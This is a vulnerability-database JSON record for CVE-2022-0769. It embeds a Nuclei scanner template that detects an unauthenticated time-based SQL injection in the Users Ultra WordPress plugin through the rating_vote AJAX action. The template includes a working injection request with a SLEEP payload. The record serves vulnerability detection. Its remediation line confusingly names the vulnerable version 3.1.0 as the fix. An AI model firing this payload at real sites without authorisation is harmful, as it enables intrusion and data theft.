{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-0769/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-0769/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-0769/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-0769/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-0769/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-0769"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-0769"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2022/CVE-2022-0769.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2022-0769\n\ninfo:\n  name: Users Ultra <= 3.1.0 - SQL Injection\n  author: theamanrawat\n  severity: critical\n  description: |\n    The Users Ultra WordPress plugin through 3.1.0 fails to properly sanitize and escape the data_target parameter before it is being interpolated in an SQL statement and then executed via the rating_vote AJAX action (available to both unauthenticated and authenticated users), leading to an SQL Injection.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.\n  remediation: |\n    Update to Users Ultra version 3.1.0 or later to mitigate this vulnerability.\n  reference:\n    - https://wpscan.com/vulnerability/05eab45d-ebe9-440f-b9c3-73ec40ef1141\n    - https://wordpress.org/plugins/users-ultra/\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-0769\n    - https://github.com/ARPSyndicate/cvemon\n    - https://github.com/cyllective/CVEs\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-0769\n    cwe-id: CWE-89\n    epss-score: 0.08326\n    epss-percentile: 0.94696\n    cpe: cpe:2.3:a:usersultra:users_ultra:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: usersultra\n    product: users_ultra\n    framework: wordpress\n  tags: time-based-sqli,cve,cve2022,wp,users-ultra,wpscan,sqli,wordpress,wp-plugin,usersultra,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout: 20s\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=rating_vote&data_id=1&data_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(6)))gwe)--+\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=6'\n          - 'status_code == 200'\n          - 'contains(content_type, \"text/html\")'\n          - 'contains(body, \"You have to be logged in to leave your rate\")'\n        condition: and\n# digest: 4a0a004730450221009c8c83f4ad22029a323ea959f17709bf27730da6fec63a400917ebdbf88d9ca7022009a4a94a8cdbffd1bbcfa6ae07687eb30416bcebb7421ece67c92df507b80664:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2022-0769"
}